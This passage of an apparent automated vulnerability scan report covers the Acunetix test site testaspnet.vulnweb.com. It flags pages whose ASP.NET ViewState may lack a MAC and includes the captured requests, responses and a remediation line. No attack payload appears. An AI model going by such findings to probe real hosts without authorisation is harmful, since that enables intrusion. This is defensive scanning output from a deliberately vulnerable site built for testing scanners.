          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        12. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        13. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
